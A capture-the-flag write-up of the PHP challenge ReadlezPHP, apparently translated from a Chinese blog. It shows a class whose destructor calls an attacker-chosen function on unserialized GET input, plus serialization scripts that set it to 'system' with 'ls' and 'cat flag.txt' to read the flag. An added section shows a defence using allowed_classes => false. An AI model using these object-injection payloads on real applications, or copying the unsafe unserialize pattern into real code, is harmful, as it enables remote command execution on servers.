The original challenge should be
[NPUCTF2020]ReadlezPHP - L0VEhzzz - 博客园
PHP source
<?php
#error_reporting(0);
show_source('index.php');
class Information
{
    public $nameA;
    public $nameB;
    public function __construct(){
        $this->nameA = "Y-m-d h:i:s";
        $this->nameB = "date";
    }
    public function __destruct(){
        $nameA = $this->nameA;
        $nameB = $this->nameB;
        echo $nameB($nameA);
    }
}
if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}
@$ppp = unserialize($_GET["input"]);
?>
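This challenge again comes down to $nameB($nameA): unserialize($_GET["input"]) lets the request set both properties, so if nameB is a function name and nameA is a command, __destruct() executes it.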
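The same sink seen from the defender's side, as an added example that is not part of the original write-up: passing allowed_classes => false to unserialize() stops the Information object from being instantiated, so its __destruct() never runs. The helpers safeUnserialize() and containsObject() are hypothetical names, the Information class is a stand-in whose destructor only records the call it would make, and the payload is a constructed sample.

```php
<?php
// Added example, not code from the original post.
// Stand-in for the challenge class: its destructor only records the call it
// would have made, so this demo never executes input-chosen functions.
class Information
{
    public $nameA;
    public $nameB;
    public static $calls = [];

    public function __destruct()
    {
        self::$calls[] = $this->nameB . '(' . $this->nameA . ')';
    }
}

// Hypothetical helper: true if a decoded value holds an object at any depth.
function containsObject($value): bool
{
    if (is_object($value) || $value instanceof __PHP_Incomplete_Class) {
        return true;
    }
    foreach (is_array($value) ? $value : [] as $item) {
        if (containsObject($item)) {
            return true;
        }
    }
    return false;
}

// Hypothetical helper: decode untrusted input without instantiating any class.
function safeUnserialize(string $input)
{
    $value = unserialize($input, ['allowed_classes' => false]);
    return containsObject($value) ? null : $value;
}

// Constructed sample input: a serialized Information naming a harmless function.
$payload = 'O:11:"Information":2:{s:5:"nameA";s:5:"hello";s:5:"nameB";s:10:"strtoupper";}';

unserialize($payload);                 // as on the page: object is built, __destruct runs
var_dump(Information::$calls);         // shows the call the input selected

Information::$calls = [];
var_dump(safeUnserialize($payload));   // object input is rejected by the helper
var_dump(Information::$calls);         // shows whether __destruct ran this time
var_dump(safeUnserialize('s:11:"Y-m-d h:i:s";')); // a plain format string is accepted
```

Since the page only needs a date format, the stronger fix is to take the format as a plain string and call date() by its fixed name instead of calling a property as a function.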
Serialization script
<?php
class Information
{
    public $nameA;
    public $nameB;
    public function __construct(){
        $this->nameA = "phpinfo()";
        $this->nameB = "system";
    }
    public function __destruct(){
        $nameA = $this->nameA;
        $nameB = $this->nameB;
        echo $nameB($nameA);
    }
}
// Serialize the object
$user = new Information(); # instantiate
$str_ser = serialize($user);
echo "序列化结果为:\n";
var_dump($str_ser);
?>
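I tried this first.
Although I got the page's functions, I could not find the flag.
The challenge has been changed,
so I tried listing the web directory.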
<?php
class Information
{
    public $nameA;
    public $nameB;
    public function __construct(){
        $this->nameA = "ls";
        $this->nameB = "system";
    }
    public function __destruct(){
        $nameA = $this->nameA;
        $nameB = $this->nameB;
        echo $nameB($nameA);
    }
}
// Serialize the object
$user = new Information(); # instantiate
$str_ser = serialize($user);
echo "序列化结果为:\n";
var_dump($str_ser);
?>
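The flag file shows up in the output.
So how do I read it by name?
This is the point where I felt I really learned something!
Just follow the same pattern!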
<?php
class Information
{
    public $nameA;
    public $nameB;
    public function __construct(){
        $this->nameA = "cat flag.txt";
        $this->nameB = "system";
    }
    public function __destruct(){
        $nameA = $this->nameA;
        $nameB = $this->nameB;
        echo $nameB($nameA);
    }
}
// Serialize the object
$user = new Information(); # instantiate
$str_ser = serialize($user);
echo "序列化结果为:\n";
var_dump($str_ser);
?>
Use a system command to read flag.txt,
and then
I got the flag.